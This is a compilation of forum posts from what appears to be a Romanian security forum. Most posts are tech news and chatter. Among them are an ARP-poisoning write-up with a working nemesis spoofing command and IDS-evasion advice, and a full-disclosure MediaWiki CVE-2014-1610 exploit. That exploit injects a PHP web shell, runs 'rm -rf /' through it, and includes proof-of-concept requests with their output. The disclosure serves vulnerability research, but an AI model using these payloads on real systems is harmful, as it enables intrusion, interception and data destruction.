Nytro

Incearca pe Linux.

Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis, is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting. Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets. Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected. [TABLE=width: 100%] [TR] [TD]Author:[/TD] [TD]Jeff Nathan <jeff@snort.org>[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD]Source code:[/TD] [TD]nemesis-1.4.tar.gz (Build 26) (DSA sig)[/TD] [/TR] [TR] [TD]Windows binary:[/TD] [TD]nemesis-1.4.zip (Build 26) (DSA sig) (includes LibnetNT)[/TD] [/TR] [/TABLE] Sursa: nemesis.sourceforge.net - Packet injection tool suite

A More Powerful, Stealthier and Uncommon ARP Poisoning Technique ARP poisoning is a well-known technique used to perform MITM (man-in-the-middle) or DoS (denial of service) attacks on a LAN. You might think that every security researcher and every hacker knows this technique inside out. After all it is pretty simple. Send a spoofed ARP reply packet announcing "hey, you may or may not have asked for it, but I am X.X.X.X and my MAC address is YY:YY:YY:YY:YY:YY" and the target host receiving this packet will start sending traffic destined to X.X.X.X to whoever owns YY:YY:YY:YY:YY:YY on the LAN, typically a malicious host intercepting and/or modifying sensitive traffic. It is that simple. Or is it? A little-known variation of this classic poisoning attack is based on sending spoofed requests instead of replies. I am going to demonstrate that contrary to what the current literature describes, poisoning with ARP requests is noticeably more powerful and robust. Amongst other things, not only it works against all network stacks I tested (Windows 7 to 2000, Linux, OpenBSD, FreeBSD) but it also allows something that classic poisoning is unable to do: adding new ARP entries, in addition to overwriting existing ones. Description Let me start by quoting RFC 826, documenting ARP. It is not every day that one gets the opportunity to scrutinize a 30 years old RFC: Packet Reception: When an address resolution packet is received, the receiving Ethernet module gives the packet to the Address Resolution module which goes through an algorithm similar to the following. Negative conditionals indicate an end of processing and a discarding of the packet. ?Do I have the hardware type in ar$hrd? Yes: (almost definitely) [optionally check the hardware length ar$hln] ?Do I speak the protocol in ar$pro? Yes: [optionally check the protocol length ar$pln] Merge_flag := false If the pair is already in my translation table, update the sender hardware address field of the entry with the new information in the packet and set Merge_flag to true. ?Am I the target protocol address? Yes: If Merge_flag is false, add the triplet to the translation table. ?Is the opcode ares_op$REQUEST? (NOW look at the opcode!!) [...] Notice that the triplet is merged into the table before the opcode is looked at. This is on the assumption that communcation is bidirectional; if A has some reason to talk to B, then B will probably have some reason to talk to A. The RFC describes that the sender IP and MAC addresses are added to the table before looking at the opcode indicating whether it is an ARP request or reply. In other words: ARP poisoning can be performed with ARP requests, in addition to ARP replies. Another consequence of this behavior is that it is possible to insert new entries in the ARP table, in addition to overwriting existing ones, something that is usually described as impossible. Example You might be wondering if modern network stacks really do implement ARP this way. The answer is yes. I have successfuly exploited many different stacks in the past 10 years with this very technique. Namely: Windows 2000, XP, 2003, Vista, 2008, 7 Linux kernel 2.4, 2.6 OpenBSD 4.6 (also tested 2.x and 3.x back in the days) FreeBSD 4.x, 5.x (I have not tested newer versions but they are likely vulnerable as well) etc It is interesting that RFC 826 documents the behavior pretty clearly, yet no ARP poisoning tool seems to purposefully exploit this fact. To be more correct, Ettercap is probably the only one (see arp_poison_request setting), however even its implementation seems to be just a curiosity that has fallen into disuse, forgotten, and disabled by default (arp_poison_request=0 in etter.conf). As of May 10, 2010, before publishing this text, Googling "arp_poison_request" returned no results other than a few default etter.conf files accidentally indexed by the Googlebot. It is as if its developers realized it could work, but being unsure of its usefulness they disabled it by default and documented it as only "useful against targets that cache even arp request values". Not only they did not seem to realize it works against virtually any target, but more importantly I find no public mention of the multiple advantages of poisoning via ARP requests! Let me demonstrate the technique with the generic packet injection tool nemesis that I am going to use to craft an ARP packet from scratch. To insert or overwrite the entry (10.2.44.90, 00:de:ad:be:ef:00) in the ARP table of the target (10.2.32.1, 00:30:48:xx:xx:xx), run this command from the attacker's machine: $ nemesis arp \ -h 00:de:ad:be:ef:00 -S 10.2.44.90 \ -m 0:0:0:0:0:0 -D 10.2.32.1 \ -d eth0 -M 00:30:48:xx:xx:xx This will send the request "arp who-has 10.2.32.1 tell 10.2.44.90" while 10.2.44.90 pretends to have the MAC address 00:de:ad:be:ef:00. The Ethernet frame will have the destination MAC address 00:30:48:xx:xx:xx (to only poison this target instead of the whole broadcast domain), and will have the source MAC address of the attacker's eth0 NIC (which is 00:1f:e2:xx:xx:xx, but this is irrelevant). Here is a representation of the ARP request: Right before receiving the ARP request, the target does not know 10.2.44.90. The target in my example runs OpenBSD 4.6, so we can verify that it does not know about this IP with the arp command: $ arp -n 10.2.44.90 10.2.44.90 (10.2.44.90) -- no entry After receiving the ARP request, it gets poisoned: $ arp -n 10.2.44.90 ? (10.2.44.90) at 00:de:ad:be:ef:00 on bge0 Notice how this is a new entry that was created. Classic ARP poisoning cannot create new entries like this. At this point, another very nice thing about this poisoning technique is that the target will of course send back an ARP reply to 00:de:ad:be:ef:00. If you are the attacker, you will get a confirmation of successful poisoning, How practical! Here is the ARP reply: A couple remarks: An alternative version of the attack is that it can also work no matter what target IP address is used in the ARP request. In other words in this example if an "arp who-has x.x.x.x tell 10.2.44.90" was sent for any value of x.x.x.x, it would still poison, except that of course no ARP reply will be sent back because x.x.x.x is not an existent host. This alternative version works at least against Linux and OpenBSD. It does not work against Windows 7. I have not tested any other Unix or Windows version. In my example the ARP request packet had an Ethernet frame source MAC address of 00:1f:e2:xx:xx:xx which was different from the ARP sender MAC address 00:de:ad:be:ef:00. I made them different to demonstrate this is possible. But in practice they are often the same (ie. an attacker would want to inject his MAC 00:1f:e2:xx:xx:xx in the table instead of 00:de:ad:be:ef:00). However if the attacker really wants to inject 00:de:ad:be:ef:00, he may prefer to set the Ethernet frame source MAC address to 00:de:ad:be:ef:00 in order to match the ARP sender MAC address. This would be stealthier. With nemesis this can be by adding -H 00:de:ad:be:ef:00. Advantages Poisoning with ARP requests is advantageous for at least 4 reasons. Firstly, it can be used to inject new entries in ARP tables, in addition to overwriting existing ones. Classic poisoning with ARP replies can only do the latter; the entry has to exist in the table already (even if marked "incomplete" in the output of the arp command) before it can be poisoned. Classic poisoning makes the attacker blind as he does not know if the lack of intercepted network traffic is because an ARP entry was poisoned but there is no traffic, or because there was no ARP entry which caused the poisoning attempt to be unsuccessful. Poisoning with ARP requests makes ARP poisoning more powerful. Secondly, the ARP reply sent back by the target is a nice side-effect that be used by the attacker to get a positive validation of the success of ARP poisoning. It makes ARP poisoning more robust. Thirdly, the alternate version of the attack where an arbitrary x.x.x.x ARP target IP address is used in the ARP request makes it possible to poison many hosts on a LAN at once with a single ARP request packet that is naturally broadcasted to the entire LAN (like the normal usage of ARP). With classic poisoning, one would have to either broadcast an ARP reply (replies are not expected to be broadcasted, which may trigger IDS alerts, etc), or send one ARP reply to every host that needs to be poisoned (the volume of ARP replies might also trigger alerts, etc). Fourthly, noone seems to be very much aware of this ARP poisoning technique. Therefore the technique may be useful to evade detection as noone expects it to be used. Tcpdump does not show the ARP sender MAC address (not to be confused with the Ethernet frame source MAC address), even in verbose mode (-vvv), so a human reading logs might miss ARP poisoning attempts. Intrusion Detection Systems analyzing network traffic might not inspect "obviously unmalicious" ARP requests. I hope my blog post will raise awareness of poisoning based on ARP requests! mrb Monday 10 May 2010 at 02:25 am | ¶ | Default Sursa: A More Powerful, Stealthier and Uncommon ARP Poisoning Technique - Zorinaq

Halep s-a impus în finala de la Doha în fa?a nem?oaicei Kerber ?i a cî?tigat primul trofeu din 2014: liveTEXT ACUM Simona Halep - Angelique Kerber în finala de la Doha :: GSP.RO

Stiu ca majoritatea romanilor dar si strainilor au o parere negativa despre Romania. As vrea ca macar noi sa vedem si lucrurile bune si sa nu le uitam. Vreau ca aici sa facem o lista cu lucrurile pozitive despre Romania. Voi incepe prin 2 exemple de azi: 1. Simona Halep s-a calificat in finala turneului de tenis de la Doha: Halep: Sunt foarte mul?umit? de presta?ia mea, a fost un turneu incredibil - Mediafax 2. Dupa olimpiada de matematica, romanii sunt pe primul loc in Europa si pe locul 10 in lume: Romania’s brains rank first in Europe, 10th in the world after Math Olympiad | Romania-Insider.com Astept sa actualizati aceasta lista pe masura ce observati ca exista si parti bune in a fi roman, ca exista persoane cu care ne putem mandri. Va sfatuiesc sa evitati caterinca.

Toate aceste topicuri sunt de "Ajutor". Aveti deja o categorie pentru asa ceva. Cand o sa vad 2-3 articole postate de voi pe aceasta tema, dar nu probleme ale voastre la care asteptati o rezolvare, voi lua in considerare aceasta sugestie.

Aratati-mi cate 5 posturi facute de voi pe aceasta tema.

Da link.

Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? Publicat de Andrei Av?d?nei O echip? european? de fizicieni au demonstrat cum un aparat poate teleporta informa?ie cuantic? c?tre un spa?iu de stocare SSQ(Solid-State Quantum) printr-o fibr? telecom, o capabilitate crucial? în viitorul internetului cuantic. Ce înseamn? teleportare cuantic?? Teleportarea cuantic? este capacitatea de a transmite ceva dintr-o loca?ie în alta f?r? a traversa spa?iul dintre cele dou?. Materia în sine nu realizeaz? c?l?toria, doar informa?ia ce o descrie. Aceasta este transmis? c?tre un corp nou ce preia identitatea originalului. Articol complet: Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? | WORLDIT

Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software Aurelian Mihai - 11 feb 2014 Viitoarele genera?ii de tablete ?i telefoane Samsung ar putea include o func?ie de monitorizare care înregistreaz? cu lux de am?nunte modul în care sunt folosite dispozitivele cu sistem Android. Identificat dup? numele Context, serviciul de monitorizare rezident în memoria dispozitivelor Samsung cu sistem Android va urm?ri permanent modul de folosire a aplica?iilor instalate ?i datele furnizate de senzorii telefonului. Suplimentar, vor fi colectate informa?ii despre preferin?ele utilizatorilor înregistrând cuvintele tastate pe ecran. Mai departe, Samsung ar putea pune informa?iile colectate la dispozi?ia dezvoltatorilor de aplica?ii pentru Android, cu scopul de a-i ajuta s? aduc? îmbun?t??iri ce r?spund mai bine nevoilor utilizatorilor. Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu produc?torii de aplica?ii pentru Android Desigur, serviciul Context va avea un rol ?i pentru majorarea veniturilor din publicitate, adaptând reclamele afi?ate în func?ie de interesele utilizatorilor. Spre exemplu, dup? o c?utare dup? re?ete de buc?t?rie am putea fi bombarda?i cu reclame pentru restaurante care servesc produsul respectiv gata preparat. Potrivit zvonurilor, introducerea serviciului Context a fost amânat? temporar, dup? ce o analiz? mai atent? a scos la iveal? temeri privind efectele negative pe care m?sura le-ar putea avea asupra vânz?rilor de telefoane Samsung. Via:Theverge.com Sursa: Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software

Via Andrei

https://www.youtube.com/watch?v=fvxqnQmahTA

Stergeti cookie-urile de la Yahoo si incercati din nou.

Eu voi participa atat la dezvoltarea scirptului PHP cat si la crearea challenge-urilor. La design nu pot ajuta.

Salut, In urma unei sugestii am decis ca ar fi o idee buna sa avem propriul portal CTF (Capture The Flag). Pentru cei care nu cunosc acest termen, CTF este un concurs unde participantii trebuie sa rezolve cat mai multe probleme si primesc puncte in functie de dificultatea acestora. Domeniile pe care problemele pot sa le acopere sunt foarte variate: hacking, steganografie, criptografie, programare, algoritmica si multe altele. Pentru dezvoltarea acestui proiect avem nevoie de persoane capabile sa: 1. dezvolte astfel de probleme (de preferat persoane care au participat la astfel de competitii si Hertz) 2. dezvolte un script PHP/MySQL, bine structurat, OOP, pentru managementul utilizatorilor si al challenge-urilor (cu experienta) 3. designeri pentru acest portal (Javascript/jQuery, CSS3, HTML5) Cei care au posibilitatea de a contribui la acest proiect sunt rugati sa imi dea PM sau sa posteze aici. De asemenea am dori sa oferim premii celor care ocupa primele locuri la finalul competitiei (un termen limita). Cu aceasta ocazie, cine are posibilitatea de a dona atat bani, cat si diverse licente sau servicii, e rugat sa imi dea un PM. Peste cateva zile, in functie de numarul persoanelor interesate, vom pune lucrurile in miscare. Astept PM sau postati aici (de preferat) daca puteti ajuta.

Sa nu va plangeti ca ati luat teapa ca aveti ban. Minim 50 de posturi pentru astfel de afaceri.

Unde mai e anonimitatea daca persoana cu care vorbesti iti stie IP-ul?

Da, stiu, RC4 are NISTE probleme, de aceea am spus ca cine il "sparge" are VIP. Pacat ca nu prea se mai foloseste.

RSA 4096 + AES 256 GCM. Am mai multa incredere in RSA decat in curbele eliptice. Mod de functionare: 1. Client -> Server (handshake, validare certificat server, validare certificat client) 2. Server -> Client 2 (la fel) 3. Client -> Client 2 (serverul actioneaza doar ca router. Se face handshake si se fac verificari de certificate pe clienti) Serverul va avea un CA pe baza caruia se va verifica certificatul acestuia. Fiecare user isi va genera propriul CA si cumva, il va oferi utilizatorului cu care doreste sa comunice. Validarea certificatelor se va face pe baza acestui certificat. ps-axl, tu de ce te vei ocupa? PS: Se poate opta pentru certificate platite, semnate de un root CA. Astfel, un user care are un site, www.vasile.com, isi ia certificat pentru acel site si certificatul e ulterior validat pe baza root CA-ului de care a fost semnat. In cazul acesta, root CA-ul este public si "transmiterea" acestuia este mult mai simpla. PS2: Astept de la cel care a zis ca SSL poate fi spart sa imi faca un demo cu RC4 cu cheia pe 56 de biti si sunt multumit, are VIP. Daca imi face un demo cu AES 128 bit si RSA 1024 bit are Administrator.

In sfarsit o idee buna. Hertz, tu ce parere ai?

Hacking and patching TP-LINK TD-W8901G router By piotrbania.com / 31.01.2014 Motivation Recently a critical vulnerability has been found in TP-LINK routers and few other router devices. This particular vulnerability to which I am referring was described here. Basically it is so called ROM-0 attack. In short attacker by requesting ROM-0 through HTTP request (ie. http://192.168.1.1/ROM-0) can download all important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I have decided to patch the vulnerability by myself. DISCLAIMER: Author takes no responsibility for any actions with provided informations or codes. Your are doing everything on your own responsibility. The list of vulnerable devices is presented below: TD-W8901G TD-8816 TD-W8951ND TD-W8961ND D-Link DSL-2640R ADSL Modem AirLive WT-2000ARM Pentagram Cerberus P 6331-42 ZTE ZXV10 W300 I had one of those devices (TD-W8901G) and I took this as a good fortune sign to start playing with hardware router hacking . My task was to patch this vulnerability and make the ROM-0 not downloadable. This was my pretty much first encounter with this type of stuff (and my first encounter with MIPS really). At this point I would like to thank hackerfantastic and robercik for some hardware hints. Serial connection Most of the routers (or embedded devices in general) have some sort of communication port designed to aid the manufactures with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I have found the serial port instead (presented on images below). First of all this is some ugly ass soldering work (yes I did that). Ok now getting back to my initial point I have used PL2303 RS232<>USB converter to connect the serial port to the usb port of my computer. Putty is pretty decent for handling normal serial communication so I have used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my putty but unfortunately I got nothing. So after some digging around and harassing few friends (ohayo!) I have found out that my voltage levels on RX and TX pins were too low (should be 3.3V). So after some further digging and looking on schematics of this board it became obvious that two resistors are missing (see image above). So I took a piece of wire and I have connected the empty pins together (in two places obviously). So now the voltage levels were correct and I was able to see the output in my terminal. Articol complet: PIOTRBANIA.COM :: Hacking and patching TP-LINK TD-W8901G router

[h=3]The registration marathon is now live![/h] https://olympic-ctf.ru/register

Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup ianbeer@chromium.org tl?dr Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderersupplied pointer was freed to get code execution in the browser process by spraying multiple gigabytes of sharedmemory. Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit

MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) From: Pichaya Morimoto <pichaya () ieee org> Date: Sat, 1 Feb 2014 22:28:51 +0700 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #################################################################### # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # #################################################################### # Exploit: #################################################################### 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "<?php%20system(\\$_GET[1]);">https://rstforums.com/forum/images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: #################################################################### thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php includes/filerepo/file/File.php # Vulnerability Analysis: #################################################################### 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image <? ... 1.1 Called directly, use $_GET params wfThumbHandleRequest(); 1.2 Handle a thumbnail request via query parameters function wfThumbHandleRequest() { $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET; wfStreamThumb( $params ); // stream the thumbnail } 1.3 Stream a thumbnail specified by parameters function wfStreamThumb( array $params ) { ... $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here ... // Backwards compatibility parameters if ( isset( $params['w'] ) ) { $params['width'] = $params['w']; // << Inject os cmd here! unset( $params['w'] ); } ... $img = wfLocalFile( $fileName ); ... // Thumbnail isn't already there, so create the new thumbnail... $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php <? ... function transform( $params, $flags = 0 ) { ... $handler = $this->getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php <? ... function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { ... $width = $params['width']; ... $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}"; $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath ); $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor ); $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument $cmd .= wfEscapeShellArg( $dstPath ) . ")"; $cmd .= " 2>&1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits <? ... function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) { ... passthru( $cmd, $retval ); // << Execute here!! POC: GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02 <html><head><title>Error generating thumbnail</title></head> <body> <h1>Error generating thumbnail</h1> <p> ?????????????????????????????: /bin/bash: -: command not found<br /> convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br /> GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> </p> </body> </html> GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 uid=33(www-data) gid=33(www-data) groups=33(www-data) # Back-end $cmd #################################################################### GlobalFunctions.php : wfShellExec() cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1 Sursa: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

[h=3]MS Word 2013 Reading Locations[/h]Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed. After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored. When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Screenshot of Reading Locations Subkey[/TD] [/TR] [/TABLE] Datetime Value The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM. File Path Value The File Path value is the fully qualified file name. Position Value The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document. [h=4]Forensic Implications[/h] Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated, however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten. Posted by Jason Hale at 11:51 PM Sursa: Digital Forensics Stream: MS Word 2013 Reading Locations